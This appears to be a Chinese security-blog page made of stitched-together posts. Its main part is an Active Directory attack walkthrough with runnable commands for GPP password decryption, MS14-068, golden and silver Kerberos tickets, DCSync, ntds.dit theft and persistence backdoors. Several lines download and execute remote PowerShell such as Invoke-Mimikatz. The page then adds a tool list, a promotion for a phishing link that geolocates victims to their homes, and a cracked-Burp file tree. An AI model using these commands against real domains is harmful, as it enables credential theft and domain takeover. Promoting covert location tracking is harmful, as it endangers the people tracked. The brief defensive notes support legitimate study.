信息收集 网上各种前期信息收集的文章各种net view之类的太多了，一般想知道哪一台是域控知道自己内网的DNS就可以了,一般域控安装都有安装DNS有些不止一台,其次是通过扫描获取开放端口为389机器或者使用nltest命令查看。最后就是各种net view查看域控是哪台主机。 nltest /DCLIST:pentest.com 这里利用PowerTools中的PowerView信息收集其实很多功能都是net命令这里只是以PowerShell方式实现 Powershell.exe -Nop -NonI -Exec Bypass "IEX (New.ObjectNet.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerTools/master/PowerView/powerview.ps1');Get-HostIP" 更详细参考： 域渗透信息收集PowerToolshttps://github.com/cheetz/PowerTools Get-NetDomain - gets the name of the current user's domainGet-NetForest - gets the forest associated with the current user's domainGet-NetForestDomains - gets all domains for the current forestGet-NetDomainControllers - gets the domain controllers for the current computer's domainGet-NetCurrentUser - gets the current [domain\]usernameGet-NetUser - returns all user objects, or the user specified (wildcard specifiable)Get-NetUserSPNs - gets all user ServicePrincipalNamesGet-NetOUs - gets data for domain organization unitsGet-NetGUIDOUs - finds domain OUs linked to a specific GUIDInvoke-NetUserAdd - adds a local or domain userGet-NetGroups - gets a list of all current groups in the domainGet-NetGroup - gets data for each user in a specified domain groupGet-NetLocalGroups - gets a list of localgroups on a remote host or hostsGet-NetLocalGroup - gets the members of a localgroup on a remote host or hostsGet-NetLocalServices - gets a list of running services/paths on a remote host or hostsInvoke-NetGroupUserAdd - adds a user to a specified local or domain groupGet-NetComputers - gets a list of all current servers in the domainGet-NetFileServers - get a list of file servers used by current domain usersGet-NetShare - gets share information for a specified serverGet-NetLoggedon - gets users actively logged onto a specified serverGet-NetSessions - gets active sessions on a specified serverGet-NetFileSessions - returned combined Get-NetSessions and Get-NetFilesGet-NetConnections - gets active connections to a specific server resource (share)Get-NetFiles - gets open files on a serverGet-NetProcesses - gets the remote processes and owners on a remote server   获取域方法 SYSVOL是指存储域公共文件服务器副本的共享文件夹，它们在域中所有的域控制器之间复制。Sysvol文件夹是安装AD时创建的，它用来存放GPO、Script等信息。同时，存放在Sysvol文件夹中的信息，会复制到域中所有DC上。使用Group Policy Preferences配置组策略批量修改用户本地管理员密码 开始->管理工具->组策略管理->在这个域中创建GPO设置-右键-编辑-用户配置-首选项-控制面板设置-本地用户和组 更新Administrator密码： 域服务器一般都会共享这个文件夹,或者搜索当前机器下的XML文件将包含凭据： groups.xml、scheduledtasks.xml、Services.xml、datasources.xml。映射驱动（Drives.xml）数据源（DataSources.xml）打印机配置（Printers.xml）创建/更新服务（Services.xml）计划任务（ScheduledTasks.xml） 由于经过身份验证的用户（任何域用户或受信任域中的用户）具有对SYSVOL的读取权限 \192.168.50.205sysvolpentest.comPolicies{84017B64-2662-4BA3-A06C-FB953CCBE92D}UserPreferencesGroups.xml 经过AES-256位加密 cpassword="fUCMHAw9I2PdYRZEBMS54IvtPHX3ni44qRkWtfBtxoA" 可以使用AES私钥解密GPP密码 微软在MSDN上发布了AES加密密钥（共享密钥） https://msdn.microsoft.com/en-us/library/2c15cbf0-f086-4c74-8b70-1f2fa45dd4be.aspx 使用PowerShell脚本解密 https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-GPPPassword.ps1 寻找SYSVOL里的密码和攻击GPP（组策略偏好）https://www.freebuf.com/vuls/92016.html Windows Server 2008 R2之四管理Sysvol文件夹http://blog.51cto.com/ycrsjxy/203095 SYSVOL中查找密码并利用组策略首选项https://adsecurity.org/?p=2288 利用SYSVOL还原组策略中保存的密https://xianzhi.aliyun.com/forum/topic/1653/?accounttraceid=c4c9a768-4a9f-42f8-b1e1-f8707574eeb9 防： 在用于管理GPO的计算机上安装KB2962486,以防止将新凭据置于组策略首选项中。设置Everyone访问权限不在组策略中使用域控密码设置共享文件夹SYSVOL的访问权限删除现有的GPP里包含密码的xml文件。 Kerberos是西方神话中守卫地狱之门的三头犬的名字。只所以使用这个名字是因为Kerberos需要三方的共同参与，才能完成一次事务处理。 Kerberos 是Windows活动目录中使用的客户/服务器认证协议，为通信双方提供双向身份认证。相互认证或请求服务的实体被称为委托人（principal）。参与的中央服务器被称为密钥分发中心（简称KDC）。KDC有两个服务组成：身份验证服务（Authentication Server，简称AS）和票据授予服务（Ticket Granting Server，简称TGS）。在Windows域环境下，身份验证服务和票据授予服务可同时运行在任何可写域控服务器上。 更多阅读: Kerberos协议的滥用https://www.freebuf.com/articles/system/45631.html Kerberos的工作原理http://adsecurity.org/?p=227 最根本的问题在于权限属性证书可以被伪造,权限属性证书中存储帐号用户名、ID、组成员等信息,掌握域用户一些基本信息就可以获取域管理员权限 攻击者可以有效地重写有效的Kerberos TGT身份验证票据，使其成为域管理员（和企业管理员） https://github.com/bidord/pykek/archive/master.ziphttps://github.com/gentilkiwi/mimikatz/releases/ apt-get install krb5-user apt-get install rdate MS14-068过程： 请求没有PAC的Kerberos TGT认证票据作为标准用户，DC回复TGT生成一个伪造的PAC，没有密钥，所以生成的PAC使用域用户的密码数据用MD5算法而不是HMAC_MD5“签名”。作为TGS服务票据请求的一部分，使用伪造的PAC作为授权数据发送无PAC的TGT到DC。DC似乎被这个混淆了，所以它放弃了用户发送的不含PAC的TGT，创建一个新的TGT，并将伪造的PAC插入到它自己的授权数据中，并将这个TGT发送给用户。这个伪造PAC的TGT使得用户可以成为易受攻击的DC上的域管理员。 whoami /user python ms14-068.py -u 域用户@域名 -p 密码 -s 用户SID -d 域主机 产生缓存的票据,在当前Kali下生成之后再放到域用户机器中 利用mimikatz工具将得到的TGT_domainuser@SERVER.COM.ccache写入内存，创建缓存证书： mimikatz.exe "kerberos::ptc c:TGT_darthsidious@pentest.com.ccache" exit klist 查看 net use k: \pentest.comc$ dir k: 相关资料: Kerberos工具包PyKEKhttp://adsecurity.org/?p=676 深入解读MS14-068漏洞http://www.freebuf.com/vuls/56081.html Kerberos安全漏洞http://adsecurity.org/?p=541 防： 安装检查KB3011780的安装 SPN扫描 Kerberoast可以作为一个有效的方法从Active Directory中以普通用户的身份提取服务帐户凭据，无需向目标系统发送任何数据包 SPN 是服务在使用 Kerberos 身份验证的网络上的唯一标识符。它由服务类、主机名和端口组成。在使用 Kerberos 身份验证的网络中，必须在内置计算机帐户（如 NetworkService 或 LocalSystem）或用户帐户下为服务器注册 SPN。对于内置帐户，SPN 将自动进行注册。但是，如果在域用户帐户下运行服务，则必须为要使用的帐户手动注册 SPN。 SPN扫描的主要好处是，SPN扫描不需要连接到网络上的每个IP来检查服务端口,SPN通过LDAP查询向域控执行服务发现，spn查询是kerberos票据行为一部分,因此比较难检测SPN扫描。 powershell -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PyroTek3/PowerShell-AD-Recon/master/Discover-PSMSSQLServers'); Discover-PSMSSQLServers" 扫描SQL Server脚本：https://github.com/nullbind/Powershellery/tree/master/Stable-ish/MSSQL Import-Module .Get-SQLServerAccess.psm1PS C:Get-SqlServer-Escalate-CheckAccess [*] ---------------------------------------------------------------------- [*] Start Time: 04/01/2014 10:00:00 [*] Domain: mydomain.com [*] DC: dc1.mydomain.com [*] Getting list of SQL Server instances from DC as mydomainmyuser... [*] 5 SQL Server instances found in LDAP. [*] Attempting to login into 5 SQL Server instances as mydomainmyuser... [*] ---------------------------------------------------------------------- [-] Failed - server1.mydomain.com is not responding to pings [-] Failed - server2.mydomain.com (192.168.1.102) is up, but authentication/query failed [+] SUCCESS! - server3.mydomain.com,1433 (192.168.1.103) - Sysadmin: No - SvcIsDA: No [+] SUCCESS! - server3.mydomain.comSQLEXPRESS (192.168.1.103) - Sysadmin: No - SvcIsDA: No [+] SUCCESS! - server4.mydomain.comAppData (192.168.1.104) - Sysadmin: Yes - SvcIsDA: Yes [*] ---------------------------------------------------------------------- [*] 3 of 5 SQL Server instances could be accessed. [*] End Time: 04/01/2014 10:02:00 [*] Total Time: 00:02:00 [*] ---------------------------------------------------------------------- 通过LDAP从ADS获取SQL Server的列表，然后试图用当前域用户登陆每一个SQL Server。这次将输出到CSV文件中。 PS C:Get-SQLServerAccess -ShowSum | export-csv c:tempsql-server-excessive-privs.csv[*] ----------------------------------------------------------------------[*] Start Time: 04/01/2014 10:00:00[*] Domain: mydomain.com[*] DC: dc1.mydomain.com[*] Getting list of SQL Server instances from DC as mydomainmyuser...[*] 5 SQL Server instances found in LDAP.[*] Attempting to login into 5 SQL Server instances as mydomainmyuser...[*] ----------------------------------------------------------------------[-] Failed - server1.mydomain.com is not responding to pings[-] Failed - server2.mydomain.com (192.168.1.102) is up, but authentication/query failed[+] SUCCESS! - server3.mydomain.com,1433 (192.168.1.103) - Sysadmin: No - SvcIsDA: No [+] SUCCESS! - server3.mydomain.comSQLEXPRESS (192.168.1.103) - Sysadmin: No - SvcIsDA: No[+] SUCCESS! - server4.mydomain.comAppData (192.168.1.104) - Sysadmin: Yes - SvcIsDA: Yes [*] ----------------------------------------------------------------------[*] 3 of 5 SQL Server instances could be accessed. [*] End Time: 04/01/2014 10:02:00 [*] Total Time: 00:02:00[*] ---------------------------------------------------------------------- 弱口令猜解 Get-SQLServerAccess -sqluser sa -sqlpass 123qwe!@# 寻找敏感数据 Get-SQLServerAccess -query "select name as 'Databases' from master..sysdatabases where HAS_DBACCESS(name) = 1" 更多参考： 非扫描式的SQL Server发现https://blog.netspi.com/locate-and-attack-domain-sql-servers-without-scanning 相关资料： SPN扫描https://adsecurity.org/?p=1508 扫描SQLServer脚本https://github.com/PyroTek3/PowerShell-AD-Recon Kerberos黄金门票https://adsecurity.org/?p=1640 域服务账号破解实践http://bobao.360.cn/learning/detail/3564.html kerberos认证原理http://blog.csdn.net/wulantian/article/details/42418231 深刻理解windows安全认证机制ntlm & Kerberoshttps://klionsec.github.io/2016/08/10/ntlm-kerberos/ Kerberos身份验证流程 密码转换为NTLM哈希值，时间戳使用散列加密，并作为身份验证票据（TGT）请求（AS-REQ）中的身份验证器发送给KDC。域控制器（KDC）检查用户信息（登录限制，组成员身份等）并创建票证授予票证（TGT）。TGT被加密，签名并交付给用户（AS-REP）。只有域中的Kerberos服务（KRBTGT）才能打开并读取TGT数据。用户在申请票证授予服务（TGS）票证（TGS-REQ）时向TG提交TGT。DC打开TGT并验证PAC校验和 – 如果DC可以打开票证和校验和签出，则TGT =有效。TGT中的数据被有效地复制来创建TGS票据。使用目标服务帐户的NTLM密码散列对TGS进行加密并发送给用户（TGS-REP）。用户在适当的端口上连接到托管服务的服务器并呈现TGS（AP-REQ）。该服务使用其NTLM密码散列打开TGS票证。 其实可以说是一种后门而不是什么漏洞。黄金票据是伪造TGT,可以获取任何Kerberos服务权限,与域控制器没有AS-REQ或AS-REP（步骤1和2）通信。由于黄金票据是伪造的TGT，它作为TGS-REQ的一部分被发送到域控制器以获得服务票据。 Kerberos黄金票证是有效的TGT Kerberos票证，因为它是由域Kerberos帐户（KRBTGT）加密/签名的 。TGT仅用于向域控制器上的KDC服务证明用户已被其他域控制器认证。TGT被KRBTGT密码散列加密并且可以被域中的任何KDC服务解密的事实证明它是有效的 利用条件： 1.普通域用户 2.krbtgt ntlm hash 3.域SID 在域上抓取hash lsadump::dcsync /domain:pentest.com /user:krbtgt kerberos::purgekerberos::golden /admin:administrator /domain:域 /sid:SID /krbtgt:hash值 /ticket:adinistrator.kiribikerberos::ptt administrator.kiribikerberos::tgtnet use k: \pentest.comc$ Kerberos银票务 攻击者如何使用Kerberos银票来利用系统https://adsecurity.org/?p=2011 https://www.feiworks.com/wy/drops/域渗透——Pass%20The%20Ticket.pdf 黄金票据和白银票据的一些区别: Golden Ticket: 伪造TGT,可以获取任何Kerberos服务权限Silver Ticket: 伪造TGS,只能访问指定的服务 加密方式不同: Golden Ticket 由krbtgt的hash加密Silver Ticket 由服务账号(通常为计算机账户)Hash加密 认证流程不同: Golden Ticket在使用的过程需要同域控通信Silver Ticket在使用的过程不需要同域控通信用户在适当的端口上连接到托管服务的服务器并呈现TGS（AP-REQ）。该服务使用其NTLM密码散列打开TGS票证。与域控制器没有AS-REQ / AS-REP（步骤1和2），也没有TGS-REQ / TGS-REP（步骤3和4）通信。由于银票是伪造的TGS，所以没有与域控制器通信。 银票是伪造的Kerberos票证授予服务（TGS）票据，也称为服务票据。 域上获取信息 mimikatz log "sekurlsa::logonpasswords" 首先需要获得如下信息: /domain /sid /target:目标服务器的域名全称，此处为域控的全称 /service:目标服务器上面的kerberos服务，此处为cifs /rc4:计算机账户的NTLM hash，域控主机的计算机账户 /user:要伪造的用户名，此处可用silver测试 mimikatz.exe "kerberos::golden /domain:域 /sid:SID /target:域全称 /service:要访问的服务 /rc4:NTLM /user:silver /ptt" 就可以访问域的cifs共享，访问其它是不行的,Silver Ticket是伪造的TGS，也就是说其范围有限，只能访问指定的服务权限 域服务账号破解 与上面SPN扫描类似的原理 https://github.com/nidem/kerberoast 获取所有用作SPN的帐户 setspn -T PENTEST.com -Q */* 从Mimikatz的ram中提取获得的门票 kerberos::list /export 用rgsrepcrack破解 tgsrepcrack.py wordlist.txt 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi 没复现成功 凭证盗窃 最常用的手法域管理登录历史记录,记得获取某边界权限一个然后抓取hash并没有域管理的,可能是搞的动静有点大,管理员第二天上去把马给清除了,还好留了有后门再次抓取hash直接获取到域管理员。 大多数Active Directory管理员使用用户帐户登录到其工作站，然后使用RunAs（将其管理凭据放置在本地工作站上）或RDP连接到服务器运行Mimikatz 读取密码，收集密码尝试登录管理员机器一般只要域管理员登录过的机器抓取都可以获取域控了 防：管理员不应该拿着域用户去登录web服务器或者邮件服务器一但这些被攻破抓取的密码就是域了 ARP 最后才是ARP欺骗不到最后不要拿出来。 RespondercainettercapBDFProxy 获取AD Hash 攻击者如何转储Active Directory数据库https://adsecurity.org/?p=2398 活动目录数据库（ntds.dit）： Active Directory域数据库存储在ntds.dit文件中（默认存储在c:WindowsNTDS中,AD数据库是Jet数据库引擎，它使用提供数据存储和索引服务的可扩展存储引擎（ESE）ESE级索引使对象属性可以快速定位。ESE确保数据库符合ACID（原子性，一致性，隔离性和持久性） – 交易中的所有操作完成或不执行。AD ESE数据库非常快速和可靠。 目录分区https://technet.microsoft.com/en-us/library/cc961591.aspx ntds.dit文件由三个主表组成：数据表，链接表和SD表。 具体详细资料查看: https://technet.microsoft.com/en-us/library/cc772829(v=ws.10).aspx 使用VSS卷影副本 什么是卷影副本? 卷影副本，也称为快照，是存储在 Data Protection Manager (DPM) 服务器上的副本的时间点副本。副本是文件服务器上单个卷的受保护共享、文件夹和文件的完整时间点副本。 支持操作系统： Windows Server 2003, Windows Server 2008, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012, Windows 8 通常拿下一台服务器时准备内网渗透，需要传你的工具到目标机器中，而且是长久渗透的这种，为了不被发现！获取系统SAM文件等 使用VSS卷影副本（通过WMI或PowerShell远程处理）远程提取ntds.dit Windows有一个名为WMI的内置管理组件，支持远程执行（需要管理员权限）。WMIC是在远程计算机上执行命令的WMI命令工具。 利用WMIC（或PowerShell远程处理）创建（或复制现有的）VSS。 wmic /node:AD /user:PENTESTAdministrator /password:123qweQWE!@# process call create "cmd /c vssadmin create shadow /for=c: 2>&1 > c:vss.log" 查看vss.log wmic /node:AD /user:PENTESTadministrator /password:123qwe!@#!@# process call create "cmd /c copy 卷影IDWindowsNTDSNTDS.dit C:windowstempNTDS.dit 2>&1" wmic /node:AD /user:PENTESTadministrator /password:123qwe!@# process call create "cmd /c copy 卷影IDWindowsSystem32configSYSTEM c:windowstempSYSTEM.hive 2>&1" net use k: \pentest.comc$ 利用这种方法可以和上面的Kerberos票结合来实现 使用DIT Snapshot Viewer可以验证我们是否成功地获得了ntds.dit文件。 https://github.com/yosqueoy/ditsnap NTDSUtil获取ntds.dit文件 Ntdsutil.exe是一个为Active Directory提供管理设施的命令行工具。 使用NTDSUTIL的IFM创建（VSS卷影副本）在DC上本地引用ntds.dit NTDSUtil是本地处理AD DB的命令实用程序（ntds.dit），并为DCPromo启用IFM集创建。IFM与DCPromo一起用于“从媒体安装”,因此被升级的服务器不需要通过网络从另一个DC复制域数据。 ntdsutil "ac i ntds" "ifm" "create full c:temp" q q 当创建一个IFM时，VSS快照被拍摄，挂载，ntds.dit文件和相关数据被复制到目标文件夹中。 此命令也可以通过WMI或PowerShell远程执行。 PowerShell提取ntds.dit 使用PowerSploit的Invoke-NinjaCopy远程提取ntds.dit（需要在目标DC上启用PowerShell远程处理功能）。 Invoke-NinaCopy是一个PowerShell函数，它可以利用PowerShell远程处理（必须在目标DC上启用PowerShell远程处理），从远程计算机上复制文件（即使文件已锁定，可直接访问文件）。 https://github.com/PowerShellMafia/PowerSploit IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-NinjaCopy.ps1'); Invoke-NinjaCopy -Path "C:windowsntdsntds.dit" -ComputerName "AD" -LocalDestination "C:tempntds.dit" 使用Mimikatz提取 使用Mimikatz在提取Active Directory hash mimikatz lsadump::lsa /inject exit 使用RID 502的帐户是KRBTGT帐户，使用RID 500的帐户是域的默认管理员。 获取对Active Directory数据库文件的访问权限（ntds.dit） Active Directory数据库（ntds.dit）包含有关Active Directory域中所有对象的所有信息 该文件还包含所有域用户和计算机帐户的密码哈希值。 有时候域控升级等会把ntds.dit备份文件可从共享服务器中找到可以不用直接从域控制复制 使用Mimikatz转储LSASS内存 sekurlsa::minidump c:templsass.dmp 使用任务管理器（获取域管理员凭据）转储LSASS内存 使用PowerShell Mimikatz 使用PowerShell，域必需要能上网否则这方法不可用 powershell IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -Command '"privilege::debug" "LSADump::LSA /inject" exit' 无程获取 Powershell IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -Command ‘”privilege::debug” “LSADump:LSA /inject”‘ -Computer pentest.com Mimikatz的DCSync 使用Mimikatz的DCSync 远程转储Active Directory凭证，它有效地”模拟”域控制器并向目标域控制器请求帐户密码数据。 使用Mimikatz的DCSync和相应的权限，攻击者可以通过网络从域控制器中提取密码散列以及以前的密码散列，而无需交互式登录或复制Active Directory数据库文件（ntds.dit） 运行DCSync需要特殊权限。管理员，域管理员或企业管理员以及域控制器计算机帐户的任何成员都能够运行DCSync来提取密码数据。请注意，只读域控制器不仅可以默认为用户提取密码数据。 提取 KRBTGT用户帐户的密码数据： Mimikatz "privilege::debug" "lsadump::dcsync /domain:rd.adsecurity.org /user：krbtgt"exit 管理员用户帐户提取密码数据： Mimikatz "privilege::debug" "lsadump::dcsync /domain:rd.adsecurity.org /user：Administrator" exit NTDS.dit中提取哈希 从NTDS.dit中提取哈希，提取出来的文件通过ntdsdump是无法提取的通过esedbexport来恢复。 安装： wget https://github.com/libyal/libesedb/releases/download/20170121/libesedb-experimental-20170121.tar.gz`apt-get install autoconf automake autopoint libtool pkg-config./configuremakemake installldconfigesedbexport -m tables ntds.dit 大概需要(20-30分钟) 最后生成在./ntds.dit.export/ 使用ntdsxtract提取域信息 git clone https://github.com/csababarta/ntdsxtract.gitpython setup.py build && python setup.py install 提取hash: (这里需要将刚拷出来的三个文件中的system复制到当前目录下) $ dsusers.py ntds.dit.export/datatable.3 ntds.dit.export/link_table.5 output --syshive SYSTEM --passwordhashes --pwdformat ocl --ntoutfile ntout --lmoutfile lmout |tee all_user_info.txt 这样提取出来之后已经是转换成hashcat可破解的格式 hashcat -m 1000 ntout ./password.txt   AD持久化 活动目录持久性技巧 https://adsecurity.org/?p=1929DS恢复模式密码维护https://blogs.technet.microsoft.com/askds/2009/03/11/ds-restore-mode-password-maintenance/ DSRM密码同步 DSRM密码同步将域控权限持久化，获取到域控权限后如何利用DSRM密码同步将域管权限持久化。 Windows Server 2008 需要安装KB961320补丁才支持DSRM密码同步，Windows Server 2003不支持DSRM密码同步。 KB961320 https://support.microsoft.com/en-us/help/961320/a-feature-is-available-for-windows-server-2008-that-lets-you-synchroni 巧用DSRM密码同步将域控权限持久化 http://drops.xmd5.com/static/drops/tips-9297.html 同步之后使用法国佬神器（mimikatz）查看krbtgt用户和SAM中Administrator的NTLM值。 可以看到两个账户的NTLM值相同，说明确实同步成功 修改注册表允许DSRM账户远程访问 修改注册表 hkey_local_machineSystemCurrentControlSetControlLsa 路径下的 DSRMAdminLogonBehavior 的值为2。 系统默认不存在DSRMAdminLogonBehavior，请手动添加。 使用HASH远程登录域控 DSRM账户是域控的本地管理员账户，并非域的管理员帐户。所以DSRM密码同步之后并不会影响域的管理员帐户。 事件查看器的安全事件中筛选事件ID为4794的事件日志，来判断域管是否经常进行DSRM密码同步操作。 缓解措施 对于这个问题的唯一有效的缓解措施就是确保每一台域控制器的DSRM账户密码是唯一的并且定期修改此密码。同时，确保注册表DsrmAdminLogonBehavior的值不为2，最好将其直接删除或者设置其值为1或0。 Security Support Providerhttps://adsecurity.org/?p=1760http://www.evil0x.com/posts/11354.html 直译为安全支持提供者 又名Security Package. 简单的理解为SSP就是一个DLL，用来实现身份认证 将mimilib.dll复制到域控c:/windows/system32下 设置SSP 修改域控注册表位置： HKEY_LOCAL_MACHINE/System/CurrentControlSet/Control/Lsa/Security Packages/ Memory Updating of SSPs privilege::debug misc::memssp 这样就不需要重启 c:/windows/system32可看到新生成的文件kiwissp.log 如果不是在域环境下生成的文件会在 system32mimilsa.log 防： 检测注册表位置： HKEY_LOCAL_MACHINE/System/CurrentControlSet/Control/Lsa/Security Packages/ 检测%windir%/System32是否有可疑dll SID历史 https://adsecurity.org/?p=1772 SID历史记录允许另一个帐户的访问被有效地克隆到另一个帐户 mimikatz "privilege::debug" "misc::addsid bobafett ADSAdministrator" AdminSDHolder＆SDProp 利用AdminSDHolder＆SDProp（重新）获取域管理权限 https://adsecurity.org/?p=1906 AdminSDHolder是位于Active Directory中的系统分区   组策略 https://adsecurity.org/?p=2716 策略对象在持久化及横向渗透中的应用https://www.anquanke.com/post/id/86531 组策略概述 组策略使管理员能够管理Active Directory中的计算机和用户。组策略保存为组策略对象（GPO） 攻击者可以滥用GPO，通过欺诈方式进一步自动化地传播恶意软件、实现持久化驻留目的 恶意软件可以利用GPO穿越IDS/IPS等防火墙，最终访问到域内所有的系统。 GPO的另一优点就是攻击过程期间并不需要目标系统在线，一旦离线状态下的目标系统重新登录到域中，恶意的GPO载荷就会被投递到目标系统。 组策略默认情况下每90分钟（域控制器5分钟）可包括安全选项，注册表项，软件安装以及启动和关闭脚本以及域成员刷新组策略设置。这意味着组策略在目标计算机上执行配置的设置。 SYSVOL是所有经过身份验证的用户具有读取权限的Active Directory中的域范围共享。SYSVOL包含登录脚本，组策略数据以及其他域控制器中需要使用的全域数据。 SYSVOL共享将自动同步并在所有域控制器之间共享。 其实我认为组策略也相当于远控,可以把配置脚本让域内的每一台电脑都种上马批量执行一遍。 或者每周在所有域上运行Mimikatz获取明文密码,以及获取某种类型文件这要通过编写脚本实现。 远程搜索某个本地文件（如proof.txt） Get-Content <list of IPs> | ForEach-Object {Getwmiobject CIM_DataFile -filter »Drive=’c:’ AND Filename=’proof’ AND extension=’txt’ -Impersonate 3 -computername $_ | Select PSComputername, Name -Unique} 一篇文章精通PowerShell Empire 2.3（上）https://www.anquanke.com/post/id/87328 防： 定期审核GPO。 为GPO使用定义清晰的命名约定 记录GPO的创建动作 Hook PasswordChangeNotify 在修改域控密码时会进行如下同步操作： a. 当修改域控密码时，LSA首先调用PasswordFileter来判断新密码是否符合密码复杂度要求 b. 如果符合，LSA接着调用PasswordChangeNotify在系统上同步更新密码 函数PasswordChangeNotify存在于rassfm.dll poc下载地址： https://github.com/clymb3r/Misc-Windows-Hacking 使用VS2015开发环境，MFC设置为在静态库中使用MFC 编译工程，生成HookPasswordChange.dll 下载Powershell的dll注入脚本 https://github.com/clymb3r/PowerShell/blob/master/Invoke-ReflectivePEInjection/Invoke-ReflectivePEInjection.ps1 在代码尾部添加如下代码： Invoke-ReflectivePEInjection -PEPath HookPasswordChange.dll –procname lsass 并命名为HookPasswordChangeNotify.ps1 上传HookPasswordChangeNotify.ps1和HookPasswordChange.dll 管理员权限执行： PowerShell.exe -ExecutionPolicy Bypass -File HookPasswordChangeNotify.ps1 将获取到的密码上传到http服务器: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html 一如既往的学习，一如既往的整理，一如即往的分享。感谢支持 ...

可能是总结的最全的开源渗透工具！ 目录 入门指南 在线靶场 文件上传漏洞靶场 导航 payload 子域名枚举 自动爬虫实现的子域名收集工具 waf开源及规则 web应用扫描工具 webshell检测以及病毒分析 DDos防护 Android系列工具 XSS扫描 代码审计 端口扫描、指纹识别以及中间件扫描 高级持续性威胁(APT)相关工具 工控系统及大型网络相关安全工 模块化扫描、综合扫描器 内网安全渗透测试工具集 企业网络自检 弱口令或信息泄漏扫描 社工库 数据库防火墙 数据库扫描及注入 无线网络渗透审计 物联网设备扫描 针对性漏洞测试工具 LICENSE 入门指南 Web Hacking 101 中文版：https://wizardforcel.gitbooks.io/web-hacking-101/content/ 浅入浅出Android安全 中文版：https://wizardforcel.gitbooks.io/asani/content/ Android 渗透测试学习手册 中文版：https://wizardforcel.gitbooks.io/lpad/content/ Kali Linux Web渗透测试秘籍 中文版：https://wizardforcel.gitbooks.io/kali-linux-web-pentest-cookbook/content/ Linux exploit 开发入门：https://github.com/hardenedlinux/linux-exploit-development-tutorial burpsuite实战指南：https://www.gitbook.com/book/t0data/burpsuite/details 渗透测试Node.js应用：http://www.kanxue.com/?article-read-1108.htm=&winzoom=1 Web安全资料和资源列表：https://github.com/qazbnm456/awesome-web-security 安全维基百科：https://sec-wiki.com/sec-wiki 安全漏洞信息（精）：https://ninjia.gitbook.io/secskill/Web 安全学习笔记（精）：https://websec.readthedocs.io/zh/latest/ 黑客清单：https://github.com/sunnyelf/awesome-hacking 思维导图: https://github.com/phith0n/Mind-Map 思维导图：https://github.com/SecWiki/sec-chart 渗透超全面的渗透资料 ...

很多时候我们需要定位IP所在的物理位置，而这个工具可以直接到你家门口。 当前互联网的基石便是TCP/IP协议，而虚拟中的IP地址和现实中的地址往往难以对应，而这个站点，不但提供了IP地址所在的真实地址位置，还对该IP是否为真人用户使用的做出了猜测和标注，为IP的溯源和价值提供了参考依据。 关于IP定位，最早是通过运营商实现，每个运营商申请到的ip段，在某个范围内使用。因此早期只能是国家为单位的基础数据。对于比较大的国家，就进一步划分，比如，中国某通讯公司（不打广告），固定将某些ip分配某些机房使用，而这些机房则具备地域属性，因此就可以知道某些ip的位置是哪个省市区。再进一步，网上有种测算路由的方式进行定位，就是由大范围逐个跳转，跟踪路由。从而对比找出ip所在的小范围。 如今，网络铺设已经有个相当多的特性，比如： A.国内的某大运营商，ip资源够用，直接给用户分配公网ip。我以前就在这种网络下用动态域名工具玩过网站。 B.部分运营上为了缓解ip资源不足问题，某个大范围使用代理转发方式，给到用户的是私网ip，用户最终用代理的ip池的ip访问公网。 C.电话运营商，ip资源利用率过低，几乎是一个省份用一个ip池进行代理给用户的手机网络上网 随着大数据发展，有些公司做了大数据匿名收集数据，数据实时分析。因此可以将手机收集到的精准GPS数据和当前所用IP数据成对上报给后端服务器，运算过之后，就可以得出某个IP的分布范围数据。 误差说明： 对于上述A的情况，精确度可以达到几十米 对于上述B的情况，可能得覆盖一个城市的范围 对于上述C的情况，往往是一个省份的误差程度 因此，对于有线宽带用户，分配了相对固定的公网IP，用户在这个线路下有放置了wifi无线路由器，wifi下有接入了手机用户，手机里运行了服务，比如地图，或者地图SDK。其定位精度就可以达到几十米范围。对于这种数据，只有bat这种大头才能实现的了这个规模的数据手机，因此准确度几乎无法被超越，更大的互联网公司除外。 关于精准度问题，和其他家相比最大的优势就是钓鱼链接，使用钓鱼链接定位的位置可以直接到你家楼下，精度很高。如果对方刚刚重新获取公网IP，那可能精准度稍差，但这种情况并不是很常见。 钓鱼链接用起来也很简单，通过IM、邮箱等方式发送过去，对方一打开你提供的链接，你就能获取到对方的IP地址，还有相当详细的定位信息。使用生成Key功能，输入一个自己想要使用的Key，然后将生成的链接发送过去，就可以等着查看了。 需要的小伙伴在交流群内回复IP精准查询获取地址 ...

+--- books | +--- Burp Suite使用 _ Pa55w0rd 's Blog.pdf | +--- Burp Suite使用中的一些技巧.pdf | +--- burp 日志插件「burplogger++.jar」从原理到实践-信安之路.pdf | +--- BurpSuite 代理设置的小技巧.pdf | +--- burpsuite实战指南.pdf | +--- Configuring Burp Suite with Android Nougat.pdf | +--- IOS之Burpsuite抓Https问题.pdf | +--- nmap-man-page.pdf | +--- Nmap渗透测试思维导图.png | +--- readme.md | +--- 利用Burpsuite爆破Tomcat密码.pdf | +--- 利用burp插件Hackvertor绕过waf并破解XOR加密 - 嘶吼 RoarTalk.pdf | +--- 基于BurpSuite快速探测越权-Authz插件.pdf | +--- 如何在64位Windows 10下安装java开发环境.pdf | +--- 新手福利 _ Burpsuite你可能不知道的技巧.pdf | +--- 本地文件包含漏洞检测工具 – Burp国产插件LFI scanner checks.pdf | +--- 配置Frida+BurpSuite+Genymotion, 绕过Android SSL Pinning-Configuring Frida with BurpSuite and Genymotion to bypass SSL Pinning.pdf +--- BurpSuiteCn.jar +--- Burp_start.bat +--- Burp_start_en.bat +--- cn.txt +--- Create-Desktop-Link.bat +--- GitZip-for-github_v0.3.1.crx +--- img | +--- ANSI.png | +--- crack1.png | +--- crack2.png | +--- crack3.png | +--- crack4.png | +--- crack5.png | +--- crack_ok.png | +--- CRLF_ANSI.png | +--- desktop_shortlink.png | +--- Goescat-Macaron-Burp-suite.ico | +--- hackbar.gif | +--- issues-example.png | +--- issues-example2.png | +--- passive-scan-client-0.1-jar-with-dependencies.gif | +--- ShellPass.png | +--- 